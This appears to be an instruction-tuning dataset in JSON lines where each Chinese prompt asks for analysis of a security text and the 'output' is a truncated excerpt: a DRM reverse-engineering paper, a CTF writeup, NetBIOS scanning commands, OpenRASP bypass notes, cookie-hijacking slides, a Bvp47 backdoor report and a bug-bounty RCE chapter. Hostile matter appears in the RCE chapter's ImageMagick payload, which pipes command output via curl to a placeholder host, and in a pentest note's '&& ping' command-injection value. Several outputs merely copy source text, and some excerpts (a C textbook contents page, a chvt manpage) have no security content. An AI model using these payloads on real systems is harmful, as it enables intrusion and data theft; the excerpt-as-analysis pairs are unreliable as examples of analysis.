{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnti-RE Techniques in DRM Code Jan Newger Seminar Advanced Exploitation Techniques RWTH Aachen, Germany jan.newger@rwth-aachen.de ABSTRACT In order to prevent music from being copied among con- sumers, content providers often use DRM systems to pro- tect their music files. This document describes the approach taken while analysing a DRM system (whose identity needs to be kept secret due to legal issues)1. It is shown what techniques were used to protect the system from being eas- ily reverse engineered. 1. INTRODUCTION Its common practice among DRM implementations to use strong encryption in combination with a hardware or user dependent key derivation algorithm. The DRM system in question is no exception to this, although the algorithm used for encryption, single DES [1] in this case, is considered to be outdated because of its limited key length. Because the whole system can be broken by revealing the decryption al- gorithm together with its associated key setup, the central idea of the protections used by the DRM is to make re- verse engineering as hard as possible. Although any soft- ware based protection mechanism can be reverse engineered and therefore be broken, performing such a task can be highly hindered by using various anti reverse engineering techniques. This paper will give a detailed analysis of the most significant techniques employed by the DRM and shows how to circumvent them. 2. APPROACHING THE DRM The most important step while approaching the protection was to find DRM related code which would finally lead to the decryption algorithm. A very straight forward strategy to solve this problem is to use a debugger to find relevant code by setting breakpoints on file I/O APIs like CreateFile, ReadFile and functions used to map file data in process memory by means of mem- ory mapped files. After data has been read from a DRM 1Please note that this paper lacks quite some details, be- cause i dont want to offend the developers of the DRM protected file, one would se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Plague of Livestock ## Description > > Let My people go, that they may serve Me. For if you refuse to let them go, and still hold them, behold, the hand of the Lord will be on your cattle in the field, on the horses, on the donkeys, on the camels, on the oxen, and on the sheepa very severe pestilence. And the Lord will make a difference between the livestock of Israel and the livestock of Egypt (Exodus 9:1-4). > > You will be exploring the story of the mysterious death of cows that plagued Egypt. Pay close attention to the audio file provided, as hidden clues may be lurking within. Can you uncover the secrets hidden within and solve the challenge? An MP3 file was attached. ## Solution Listening to the file, we hear a few \"Moo\"s here and there, and eventually a weird set of noises close to the end. The metadata of the file is full of information, including some amusing paths, but nothing that helps us get the flag: ```console (user@kali)-[/media/sf_CTFs/basmach/Plague_of_livestock] $ exiftool cattleplauge.mp3 | grep Path Ingredients File Path : cows_fucking_flag.wav, edited cow.mp3 Pantry Ingredients File Path : Moo! Sound Effect [COW].wav Pantry Windows Atom Unc Project Path: \\\\?\\C:\\Users\\yarde\\Desktop\\bsmch.prproj Windows Atom Unc Project Path : \\\\?\\C:\\Users\\yarde\\Desktop\\bsmch.prproj ``` The flag is revealed when we inspect the spectrogram, for example using [Sonic Visualiser](https://www.sonicvisualiser.org/): ![](images/spectrogram.png) The flag: `BSMCH{H1D1NG_D4T4_F0R_TH3_FUN}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### netbios简介 IBM公司开发主要用于数十台计算机的小型局域网该协议是一种在局域网上的程序可以使用的应用程序编程接口API为程序提供了请求低级服务的同一的命令集作用是为了给局域网提供网络以及其他特殊功能 系统可以利用WINS服务广播及Lmhost文件等多种模式将NetBIOS名-特指基于NETBIOS协议获得计算机名称解析为相应IP地址实现信息通讯所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享 ### nmap扫描 ```bash root@John:~# nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4 ``` ![](media/609f6182915a5be20f36fcd208a88055.jpg) ### msf扫描 ```bash msf > use auxiliary/scanner/netbios/nbname ``` ![](media/01dfd2e205f58aac0391c60353786434.jpg) ### nbtscan扫描 项目地址 http://www.unixwiz.net/tools/nbtscan.html **Windows:** ```bash D:\\>nbtscan-1.0.35.exe -m 192.168.1.0/24 ``` ![](media/96729621cc66eba7acfeec9df6b0e04f.jpg) ```bash D:\\>nbtstat -n 推荐 ``` ![](media/e64a202423dea3a28dc8261bfc1c7221.jpg) ![](media/fa098960ea9e6ec5369e4b0e953d5b39.jpg) ### Linux推荐 ```bash root@John:~/Desktop/nbtscan# tar -zxvf ./nbtscan-source-1.0.35.tgz1.5.1版本在附录 root@John:~/Desktop/nbtscan# make root@John:~/Desktop/nbtscan# nbtscan -r 192.168.1.0/24 ``` ![](media/c6eb887a62dbc2e53d9ce886b2561494.jpg) ```bash root@John:~/Desktop/nbtscan# nbtscan -v -s: 192.168.1.0/24 ``` ![](media/6f8c76d5ce97b73134b0d0d5c190ed85.jpg) ### NetBScanner 项目地址 https://www.nirsoft.net/utils/netbios_scanner.html ![](media/4d1a86423d89ed67c9fb7b95c6076846.jpg) ### 附录 nbtscan 链接https://pan.baidu.com/s/1hs8ckmg 密码av40 ```bash NBTscan version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko. This is a free software and it comes with absolutely no warranty. You can use,distribute and modify it under terms of GNU GPL. Usage: nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|(<scan_range>) -v verbose output. Print all names receivedfrom each host -d dump packets. Print whole packet contents. -e Format output in /etc/hosts format. -l Format output in lmhosts format.Cannot be used with -v, -s or -h options. -t timeout wait timeout milliseconds for response.Default 1000. -b bandwidth Output throttling. Slow down output so that it uses no more that ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpenRasp分析 OpenRasp分析 写在前 些志说明 正 初始化 为什么要将rasp.jar加载Bootstrap类加载器 配置初始化 ModuleLoader类初始化 引擎启动 JS初始化 Checker的初始化 CustomClassTransformer Hook 回答上遗留的ModuleClassloader的问题 如何绕过 基于正则的绕过 通过修改某些属性 覆盖插件 参考章 写在前 花了点时间学习了下openrasp的核代码这做下简单的分析 相关项地址 件名 件内容 plugin/plugin-DATE.log 检测插件的志e.g 插件异常插件调试输出 rasp/rasp-DATE.log rasp agent 调试志 alarm/alarm-DATE.log 攻击报警志JSON 格式个 policy_alarm/policy_alarm-DATE.log 安全基线检查报警志JSON 格式个 https://github.com/baidu-security/openrasp-v8 https://github.com/baidu/openrasp 这我以前官最新版的1.3.7来做下分析这为了便简单springboot写个简单的控 制器来进调试分析即可当然这不会去看后端云控部分的代码笔者只是想理清 OpenRasp的逻辑 另外说点p话顺便在这个过程当中被迫了解了点c++语法真是太妙了 些志说明 OpenRasp的志会通过件的式记录在对应件夹下志具体内容就不多解释了 点开眼就看得懂了解下个关于志录介绍完全够了 正 初始化 先既然是个基于maven的项很多关键信息都肯定有定义的类似premain-class以及 Agent-class分别是启动时加载和启动后加载rasp这我们就以premain为例另个差不多 类似 先是执 init 初始化 初始化第步 JarFileHelper.addJarToBootstrap(inst); 可以看到这其实就是把 当前jar包也就是 rasp.jar 加载Bootstrap类加载器这你可能想问为什么是最顶层的这 个 为什么要将rasp.jar加载Bootstrap类加载器 通过JVM的api把其路径追加到了启动类加载器的classpath中这样启动类加载器收到 类加载委派任务时就能通过该classpath加载到rasp.jar的所有类了根据双亲委派意味着任 何个类加载器中的任何个类都能通过显式或者隐式加载加载到rasp.jar中的类反 上说的啥法hook到通过启动类加载器加载的类纯纯扯淡 配置初始化 接下来的 readVersion() 法其实就是读取些rasp的配置 public static void readVersion() throws IOException { Class clazz = Agent.class; String className = clazz.getSimpleName() + \".class\"; String classPath = clazz.getResource(className).toString(); String manifestPath = classPath.substring(0, classPath.lastIndexOf(\"!\") + 1) + \"/META-INF/MANIFEST.MF\"; Manifest manifest = new Manifest((new URL(manifestPath)).openStream()); Attributes attr = manifest.getMainAttributes(); 没啥好看的看看 MANIFEST.MF 就好 接下来执 ModuleLoader.load(mode, action, inst); 来 ModuleLoader类初始化 先 ModueLoader 有个静态块来看看代码做了两件事个是获取rasp.jar的绝对路径另 个是获取拓展类加载器赋值给moduleClassLoader于为什么需要获取拓展类加载器这 引三梦师傅的话很好理解没啥难度 再简单看看代码待会说说这个moduleClassLoader的作在很后这先了解了解 projectVersion = attr.getValue(\"Project-Version\"); buildTime = attr.getValue(\"Build-Time\"); gitCommit = attr.getValue(\"Git-Commit\"); projectVersion = projectVersion == null ? \"UNKNOWN\" : projectVersion; buildTime = ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n365-Day: https Cookie Stealing Mike Perry Defcon 2007 Who am I?  Volunteer Tor developer  Work on Torbutton, TorFlow  Privacy advocate, censorship opponent  Forward+Reverse engineer at Riverbed  Flexitarian  Random Hacker  Wrote a page-based malloc debugger  Wrote an IRC bot that got quoted as a human in a major magazine Why am I doing this? Exploit is not new or complicated... However:  Vector is not narrow or wifi-only  Sophisticated attackers can drain bank accounts with custom cable/DSL modems  It also harms safe Tor usage, and that pisses me off  Many sites are vulnerable, and don't seem to care.  Response: Release a tool, lower the bar even more.  Encourage (correct and secure) SSL adoption Cookie Basics  Variables set by websites in your browser  Used for authentication, tracking, storage  Several properties that govern when transmitted  Domain  Path  Expiration  SSL bit (seldom used, this is where the fun begins) The 'SideJacking' Attack  Glorified sniffer  Sniffs cookies transmitted via plaintext http  Janky proxy based approach to do control+saving  Completely passive: User must visit target site  Able to save domain and path info  Path info may be too specific  Can lead to issues  Admirable PR machine for such a simple hack  Waay exceeds my PR abilities. Little help? :) Active HTTP Cookie Hijacking  Like CSRF, but we want the data transmitted, not any particular result  In fact, the server can reject the request  Scenario:  Yesterday: User logs in to mail.yahoo.com. Checks \"Remember me.\"  Today: User visits www.cnn.com via open wifi  Today: We inject <img src=\"http://mail.yahoo.com\">  Today: Browser transmits yahoo cookies for image  Today: We sniff cookies, write them to cookies.txt  Tomorrow: Use cookies.txt to read their mail Active HTTPS Cookie Hijacking  New Scenario:  Yesterday: User logs in to httpS://mail.google.com  Today: User visits www.cnn.com via open wifi  Today: We inject <img src=http://mail.google.com/mail\">  Today: Browser transmits unpr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH CHVT 1 \"1997年10月7日\" \"控制台工具\" \"Linux用户手册\" .SH NAME(名称) chvt \\- 修改虚拟终端的前台环境 .SH SYNOPSIS(总览) .BI chvt N .SH DESCRIPTION(描述) .B chvt .I N 命令用来生成 .RI /dev/tty N 的前台终端.如果它本来不存在,即创建相应的屏幕.为了删除掉 不用的VT(虚拟终端),可使用 .BR deallocvt (1). 键映射操作 .RI `Console_ N ' (通常绑定为键组合 .RI (Ctrl\\-)LeftAlt\\-F N , .I N 在1-12的范围里取值, 而 .RI RightAlt\\-F N\\-12 中的 .I N 则在13-24的范围里取值)也允许切换到其它的VT,不过实际的切换 只能在它已经分配的前提下进行.这防止了分配给新的VT一个错位 的键值. .SH \"SEE ALSO\"(另见) .BR deallocvt (1).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction 8 Basic Hacking Known Vulnerabilities 11 Introduction 11 Identifying technologies 13 Introduction 13 Wappalyzer 13 Powered By 14 Summary 15 Identifying the vulnerabilities 16 Introduction 16 Google 16 ExploitDB 17 CVE 19 Summary 19 Finding the POC 20 Introduction 20 Github 20 ExploitDB 21 Summary 21 Exploitation 22 Conclusion 22 Basic Hacking CMS 23 Introduction 23 Wordpress 24 Drupal 26 Joomla 26 Adobe AEM 28 Other 29 Conclusion 31 Basic Hacking Github 31 Introduction 31 Finding Sensitive Information 32 Conclusion 34 Basic Hacking Subdomain Takeover 35 Introduction 35 Subdomain Takeover 35 Github Takeover 37 Conclusion 43 Basic Hacking Databases 44 Introduction 44 Google Firebase 45 Introduction 45 Misconfigured Firebase Database 45 Summary 46 ElasticSearch DB 46 Introduction 46 ElasticSearch Basics 47 Unauthenticated ElasticSearch DB 48 Summary 53 Mongo Database 54 Introduction 54 MongoDB 54 Summary 55 Conclusion 55 Basic Hacking Brute Forcing 57 Introduction 57 Login Pages 57 Default Credentials 58 Brute Forcing 60 Conclusion 60 Basic Hacking Burp Suite 62 Introduction 62 Proxy 63 Target 69 Intruder 72 Repeater 78 Conclusion 79 Basic Hacking OWASP 81 Introduction 81 SQL Injection(SQLI) 82 Introduction 82 MySql 82 Union Based Sql Injection 84 Error Based Sql Injection 89 Xpath 89 PostgreSql 92 Union Based Sql Injection 93 Oracle 97 Union Based Sql Injection 98 Summary 101 Cross Site Scripting(XSS) 102 Introduction 102 Reflected XSS 103 Basic script alert 103 Input Field 104 Event Attributes 106 Stored XSS 108 DOM Based XSS 112 Introduction 112 Sources 114 Sinks 115 Polyglot 117 Beyond the alert box 118 Cookie Stealer 118 Summary 120 File Upload 120 Introduction 121 File Upload 121 Content Type Bypass 124 File Name Bypass 125 Summary 126 Directory Traversal 126 Introduction 126 Directory Traversal 127 Summary 128 Open Redirect 129 Introduction 129 Open Redirect 129 Summary 130 Insecure Direct Object Reference(IDOR) 131 Introduction 131 IDOR 131 Summary", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Risks and Vulnerabilities Associated with Wireless Hotspots Michael Sutton <msutton@idefense.com> Pedram Amini <pamini@idefense.com> Hacking The Invisible Network iDEFENSE Copyright  2003 iDEFENSE Inc. iDEFENSE Purpose  Study security from two points of view  Providers  End users  A variety of implementations  Cafés  Hotels  Tools  Laptops, Dell Axim  Hermes and Prism chipsets  Various software tools  Tolerant bladder Copyright  2003 iDEFENSE Inc. iDEFENSE WISPs Wireless Internet Service Providers  aka Hotspots What are they?  Where are they?  Airports  Hotels  Retail stores  Coffee Shops  Why go wireless?  Cost  Convenience Copyright  2003 iDEFENSE Inc. iDEFENSE Industry  Startups  Boingo  WayPort  NetNearU  HotSpotzz  Airpath Wireless  Surf and Sip  HereUAre  Deep Blue Wireless  Joltage (defunct) Copyright  2003 iDEFENSE Inc. iDEFENSE Industry (contd)  Telecomm  T-Mobile  AT&T (Cometa)  Sprint (Boingo)  Hardware  Intel (Cometa)  IBM (Cometa) Copyright  2003 iDEFENSE Inc. iDEFENSE Provider Risks  Business risks  Financial loss  Launch pad for anonymous attacks  Network level attacks  Privacy  Confidentiality  Data integrity  Denial of service attacks  Availability Copyright  2003 iDEFENSE Inc. iDEFENSE End User Risks  Node vs. Network level security  Crunchy on the outside, Chewy on the inside  Untrusted networks  Intranet safe services  Information leakage  Spoof attacks  End user awareness Copyright  2003 iDEFENSE Inc. iDEFENSE Security Implementations  Access control  Firewall restricts connectivity  Web requests redirected to login screen  Authentication takes place over SSL  Internet access is granted Copyright  2003 iDEFENSE Inc. iDEFENSE Security Implementations (contd) Internet Access Point User 1 User 2 Web Server Internet Access Point User 1 User 2 Copyright  2003 iDEFENSE Inc. iDEFENSE Security Implementations (contd)  IP address filtering  Everyone  MAC address filtering  T-Mobile  IPSec VPN  Deep Blue Wireless  Optional  DHCP lease expiration  ? Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBvp47 美国NSA方程式的顶级后门 技术细节 版本1.7 目录Contents 1. 摘要 2. 前所未见的后门 3. 后门程序概览  Bvp47 4. 组织关联和溯源 The Shadow Brokers Leaks事件关联 非对称算法私钥匹配 样本深度关联 完整控制命令行 斯诺登事件关联 Bvp47美国 NSA 方程式组织的顶级后门 文件结构 文件属性 文件结构 使用场景 4 4 4 6 1 2 4 8 8 9 9 12 13 15 5. 遍布全球的受害者 泄露出的受害者信息 利用受害主机作为跳板攻击目标 6. Bvp47后门技术详解 主要行为 Payload 字符串加解密 函数名混淆技巧 Bvp 引擎 系统 Hook 内核模块防检测 BPF 隐蔽信道 信道加密与解密 运行环境检测 其它技术特点 16 16 26 27 27 28 31 32 33 38 45 45 48 50 51 7. 总结 52 8. 参考资源 53 www.pangulab.cn 北京奇安盘古实验室科技有限公司 1. 摘要 2013年盘古实验室研究员在针对某国内要害部门主机的调查过程中提取了一个经过复杂加密 的Linux平台后门其使用的基于SYN包的高级隐蔽信道行为和自身的代码混淆系统隐藏自毁设计 前所未见在不能完全解密的情况下进一步发现这个后门程序需要与主机绑定的校验码才能正常运 行随后研究人员又破解了校验码并成功运行了这个后门程序从部分行为功能上断定这是一个顶 级APT后门程序但是进一步调查需要攻击者的非对称加密私钥才能激活远控功能至此研究人员的 调查受阻基于样本中最常见的字符串Bvp和加密算法中使用数值0x47命名为Bvp47 2016年知名黑客组织影子经纪人The Shadow Brokers宣称成功黑进了方程式组 织并于2016年和2017年先后公布了大量方程式组织的黑客工具和数据盘古实验室成员从 影子经纪人公布的文件中发现了一组疑似包含私钥的文件恰好正是唯一可以激活Bvp47顶级 后门的非对称加密私钥可直接远程激活并控制Bvp47顶级后门可以断定Bvp47是属于方程式 组织的黑客工具研究人员通过进一步研究发现影子经纪人公开的多个程序和攻击操作手 册与2013年前美国中情局分析师斯诺登在棱镜门事件中曝光的NSA网络攻击平台操作手册[参考 34]中所使用的唯一标识符完全吻合鉴于美国政府以未经允许传播国家防务信息和有意传播机密 情报等三项罪名起诉斯诺登可以认定影子经纪人公布的文件确属NSA无疑这可以充分证 明方程式组织隶属于NSA即Bvp47是NSA的顶级后门影子经济人的文档揭示受害范围超过 45个国家287个目标包括俄罗斯日本西班牙德国意大利等持续十几年时间某日本受害 者被利用作为跳板对目标发起攻击 盘古实验室为多起Bvp47同源样本事件起了一个代号电幕行动电幕Telescreen是英国 作家乔治奥威尔在小说1984中想象的一个设备可以用来远程监控部署了电幕的人或组织思 想警察可以任意监视任意电幕的信息和行为 方程式组织是世界超一流的网络攻击组织普遍认为隶属于美国国家安全局NSA从所获取的包 括Bvp47在内的相关攻击工具平台来看方程式组织确实堪称技术一流工具平台设计良好功能强 大广泛适配底层以0day漏洞体现的网络攻击能力在当时的互联网上可以说畅通无阻获取被隐秘 控制下的数据如探囊取物在国家级的网空对抗中处于主导地位 1 www.pangulab.cn 北京奇安盘古实验室科技有限公司 2. 前所未见的后门 2015年某月某客户部署的高级威胁检测系统提示特殊网络入侵告警且重要服务器之间存在可 疑的通信活动事件响应过程中在网络中的几个节点位置抓包并获取了服务器的磁盘镜像经过初步 分析系统网络中至少两台服务器已经被入侵并被植入了后门而且存在比较大量地数据外泄迹象 事件调查涉及3台服务器1台为外部攻击来源的主机A另外2台内部受影响服务器V1邮件服务 器和V2某业务服务器外部主机A与V1服务器存在非正常的通信具体表现在A先向V1服务器 的80端口发送一个带有264字节Payload的SYN包正常的SYN包一般不带Payload之后V1服务器 立即向A机器的高端端口发起对外连接并保持交换大量数据数据通信是加密的 与此几乎同时V1服务器连接V2服务器的SMB服务并执行一些敏感操作包括使用管理员账号登 录到V2服务器尝试打开终端服务枚举目录通过计划任务执行Powershell脚本等 同时发生的还有V2服务器连接V1服务器的8081端口下载可疑文件包含了Powershell脚本及 第二阶段的加密数据 V1服务器的8081端口上启动了一个Python实现的简易HTTP服务器V2服务器从上面获取了两个 文件index.html及index.htm其中ind", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 0x01 起因 朋友给某甲做渗透测试奈何甲是某知名保险系统太耐半天不出货 兄弟喊我来块来看于是有了本 0x02 客户端RCE处 朋友把靶标发给我看了下除了两个下载链接啥也没有 链接下载下来的东如图看了下录还有JRE那么很显然这客户端exe就是个JAVA启动命令执套壳 随后打开program件夹逆了下的Jar full_path前定义为户更新时输的路径 那么很简单了full_path可控诱导户安装更新时路径出输注命令即可 0x03 发现Webservice Soap接 光这个来的客户端RCE肯定是不够的接下来继续挖掘服务端 看了看没别的功能点我就简单FUZZ了下这个系统三级录 最后FUZZ出来了个webservice接 http://.xxxxxx.cn/xxxx/service D:\\software && ping hacker's IP 拼接出其wsdl接 http://.xxxxxx.cn/xxxx/service/BusinessService?wsdl 但导SoapUI或AWVS的调试模块进调试时却发现其导失败 仔细看了下WSDL返回的信息妈的WSDL Import Location和Soap Address Location都是内域名 不过幸运的是该系统的外域名拼接路径后也可以访问到这个WSDL接 但是动化的Soap接调试具是看什么就import什么这可让犯了难 0x04导SoapUI 思考了会突然想起来BurpSuite可以把RequestBody和ResponseBody的值进替换hhh那我们就有办法 导了 在Burpsuite的Porxy Option中增加Match&Replace规则 将WSDL Import Location和Soap Address Location处对应的内域名都替换为外域名 随后在SoapUI中设置Proxy 打开代理再次添加WSDLResponseBody的内域名成功被替换WSDL导成功~ 0x05 XXE挖掘 导接后发现有参数为dataXML中暗喜XXE估计是送上了 直接BurpSuite中利XXE OOB测试 OOB成功XXE到收摊~ 0x06 总结 坚持下守得云开明漏洞就在眼前~", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目 录 封面 扉页 版权 内容提要 作者简介 前言 第1章 初识C语言 1.1 C语言的起源 1.2 选择C语言的理由 1.2.1 设计特性 1.2.2 高效性 1.2.3 可移植性 1.2.4 强大而灵活 1.2.5 面向程序员 1.2.6 缺点 1.3 C语言的应用范围 1.4 计算机能做什么 1.5 高级计算机语言和编译器 1.6 语言标准 1.6.1 第1个ANSI/ISO C标准 1.6.2 C99标准 1.6.3 C11标准 1.7 使用C语言的7个步骤 1.7.1 第1步定义程序的目标 1.7.2 第2步设计程序 1.7.3 第3步编写代码 1.7.4 第4步编译 1.7.5 第5步运行程序 1.7.6 第6步测试和调试程序 1.7.7 第7步维护和修改代码 1.7.8 说明 2 1.8 编程机制 1.8.1 目标代码文件可执行文件和库 1.8.2 UNIX系统 1.8.3 GNU编译器集合和LLVM项目 1.8.4 Linux系统 1.8.5 PC的命令行编译器 1.8.6 集成开发环境Windows 1.8.7 Windows/Linux 1.8.8 Macintosh中的C 1.9 本书的组织结构 1.10 本书的约定 1.10.1 字体 1.10.2 程序输出 1.10.3 特殊元素 1.11 本章小结 1.12 复习题 1.13 编程练习 第2章 C语言概述 2.1 简单的C程序示例 2.2 示例解释 2.2.1 第1遍快速概要 2.2.2 第2遍程序细节 2.3 简单程序的结构 2.4 提高程序可读性的技巧 2.5 进一步使用C 2.5.1 程序说明 2.5.2 多条声明 2.5.3 乘法 2.5.4 打印多个值 2.6 多个函数 2.7 调试程序 2.7.1 语法错误 2.7.2 语义错误 3 2.7.3 程序状态 2.8 关键字和保留标识符 2.9 关键概念 2.10 本章小结 2.11 复习题 2.12 编程练习 第3章 数据和C 3.1 示例程序 3.2 变量与常量数据 3.3 数据数据类型关键字 3.3.1 整数和浮点数 3.3.2 整数 3.3.3 浮点数 3.4 C语言基本数据类型 3.4.1 int类型 3.4.2 其他整数类型 3.4.3 使用字符char类型 3.4.4 _Bool类型 3.4.5 可移植类型stdint.h和inttypes.h 3.4.6 floatdouble和long double 3.4.7 复数和虚数类型 3.4.8 其他类型 3.4.9 类型大小 3.5 使用数据类型 3.6 参数和陷阱 3.7 转义序列示例 3.7.1 程序运行情况 3.7.2 刷新输出 3.8 关键概念 3.9 本章小结 3.10 复习题 3.11 编程练习 第4章 字符串和格式化输入/输出 4 4.1 前导程序 4.2 字符串简介 4.2.1 char类型数组和null字符 4.2.2 使用字符串 4.2.3 strlen()函数 4.3 常量和C预处理器 4.3.1 const限定符 4.3.2 明示常量 4.4 printf()和scanf() 4.4.1 printf()函数 4.4.2 使用printf() 4.4.3 printf()的转换说明修饰符 4.4.4 转换说明的意义 4.4.5 使用scanf() 4.4.6 printf()和scanf()的*修饰符 4.4.7 printf()的用法提示 4.5 关键概念 4.6 本章小结 4.7 复习题 4.8 编程练习 第5章 运算符表达式和语句 5.1 循环简介 5.2 基本运算符 5.2.1 赋值运算符= 5.2.2 加法运算符+ 5.2.3 减法运算符- 5.2.4 符号运算符-和+ 5.2.5 乘法运算符* 5.2.6 除法运算符/ 5.2.7 运算符优先级 5.2.8 优先级和求值顺序 5.3 其他运算符 5.3.1 sizeof运算符和size_t类型 5 5.3.2 求模运算符% 5.3.3 递增运算符++ 5.3.4 递减运算符-- 5.3.5 优先级 5.3.6 不要自作聪明 5.4 表达式和语句 5.4.1 表达式 5.4.2 语句 5.4.3 复合语句块 5.5 类型转换 5.6 带参数的函数 5.7 示例程序 5.8 关键概念 5.9 本章小结 5.10 复习题 5.11 编程练习 第6章 C控制语句循环 6.1 再探while循环 6.1.1 程序注释 6.1.2 C风格读取循环 6.2 while语句 6.2.1 终止while循环 6.2.2 何时终止循环 6.2.3 while入口条件循环 6.2.4 语法要点 6.3 用关系运算符和表达式比较大小 6.3.1 什么是真 6.3.2 其", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 十五代码执行 > 作者Peter Yaworski > 译者[飞龙](https://github.com/) > 协议[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) ## 描述 远程代码执行是指注入由漏洞应用解释和执行的代码这通常由用户提交输入应用使用它而没有任何类型的处理或验证而导致 看一下这行代码 ```php $var = $_GET['page']; eval($var); ``` 这里漏洞应用可能使用 URL` index.php?page=1`但是如果用于输入了`index.php?page=1;phpinfo() `应用就会执行`phpinfo`函数并返回其内容 与之类似远程代码执行有时用于指代命令注入OWASP 区分了这两点使用命令驻入根据 OWASP漏洞应用在主机操作系统上执行任何命令同样这也由不合理处理和验证用户输入导致这会导致用户输入传递给操作系统的命令 例如 PHP 中这可能表现为用户输入传递给`system`函数 ## 示例 ### 1\\. Polyvore ImageMagick ImageMagick 是个软件包通常用于处理图像例如剪裁缩放等等 PHP 的 imagickRuby 的 rmagick 以及 paperclip以及 NodeJs 的 imagemagick 都利用了它在 2016 年 4 月该库中发现了多个漏洞其中可利用的漏洞之一就是执行远程代码这就是我关注的 简单来说ImageMagick 并没有合理地传给他的过滤文件名称并且最终用于执行`system`方法调用因此攻击者利益传入命令来执行就像`https://example.com|ls-la`它会被执行一个来自 ImageMagick 的例子是 ``` convert 'https://example.com\"|ls \"-la' out.png ``` 现在有趣的是ImageMagick 为 MVGMagick Vectire Graphics文件定义了自己的语法所以攻击者能够创建文件`exploit.mvg`带有下列代码 ``` push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg\"|ls \"-la)' pop graphic-context ``` 这之后会传给该库并且如果站点存在漏洞代码会执行并列出目录中的文件 了解其背景之后Ben Sadeghipour 测试了 Yahoo acquisition 站点以及 Polyvore 是否存在漏洞就像他博文中所述Ben 首先在它所控制的本地机器上测试了该漏洞来确认`mvg`文件是否正常工作这是他使用的代码 ``` push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:80 80/ -d @- > /dev/null`' pop graphic-context ``` 这里你可以看到它使用了 CURL 库来调用 SOMEIPADDRESS将其修改为你服务器的地址如果成功你就会得到像这样的响应 ![](img/15-1-1.jpg) Ben Sadeghipour ImageMagick 测试的服务器响应 下面 Ben 浏览了 Polyvore将文件上传为它的资料头像并在它的服务器上收到了这个响应 ![](img/15-1-2.jpg) Ben Sadeghipour Polyvore ImageMagick 响应 > 重要结论 > 阅读是成功渗透的重要组成部分这包括阅读软件漏洞和常见漏洞以及披露CVE 标识符当你碰到没有安装安全更新的站点时了解之前的漏洞能够帮助你这里 Yahoo 已经修补了服务器但是没有正确完成我找不到关于这是什么意思的解释一次你了解 ImageMagick 漏洞让 Ben 特地以这个软件为目标并得到了 $2000 的奖金 ## 总结 远程代码执行就像其他漏洞一样通常是用户输入没有合理验证和处理的结果这里提供的例子中ImageMagick 没有合理转义可能为恶意的内容它和 Ben 对该漏洞的知识一起让他能够特地寻找和测试一些漏洞站点对于搜索这些类型的漏洞来说没有简单的答案要注意发布的 CVE并且留意站点所使用的软件它们可能会过时也可能存在漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFederation & Empire Emmanuel Bouillon manu@veryopenid.net DEF CON #19 - 7th August 2011 Prelude to Federation Forward the Federation Federation Federation and Empire Federations Edge Federation and (down to) Earth Prefatory notes $ whoami Having fun in INFOSEC for a while SSTIC, PacSec, BlackHat EU, Hack.lu, #Days CVE-2010-{0283,2229,2914,2941,...}, CVE-2011-{0001,...} Disclaimer This expresses my own views and does not involve my previous, current and future employers and thus for seven generations Presentation and code provided for educational purpose only E. Bouillon Federation & Empire Prelude to Federation Forward the Federation Federation Federation and Empire Federations Edge Federation and (down to) Earth Prefatory notes $ whoami Having fun in INFOSEC for a while SSTIC, PacSec, BlackHat EU, Hack.lu, #Days CVE-2010-{0283,2229,2914,2941,...}, CVE-2011-{0001,...} Disclaimer This expresses my own views and does not involve my previous, current and future employers and thus for seven generations Presentation and code provided for educational purpose only E. Bouillon Federation & Empire Prelude to Federation Forward the Federation Federation Federation and Empire Federations Edge Federation and (down to) Earth Outline 1 Prelude to Federation Introduction 2 Forward the Federation Where we come from 3 Federation What you need to know 4 Federation and Empire Sharpen your weapons 5 Federations Edge Design assessment 6 Federation and (down to) Earth Conclusion E. Bouillon Federation & Empire Prelude to Federation Forward the Federation Federation Federation and Empire Federations Edge Federation and (down to) Earth Introduction Outline 1 Prelude to Federation Introduction 2 Forward the Federation Where we come from 3 Federation What you need to know 4 Federation and Empire Sharpen your weapons 5 Federations Edge Design assessment 6 Federation and (down to) Earth Conclusion E. Bouillon Federation & Empire Prelude to Federation Forward the Federation Federation Federatio", "category": "text_analysis", "source": "security_papers"}
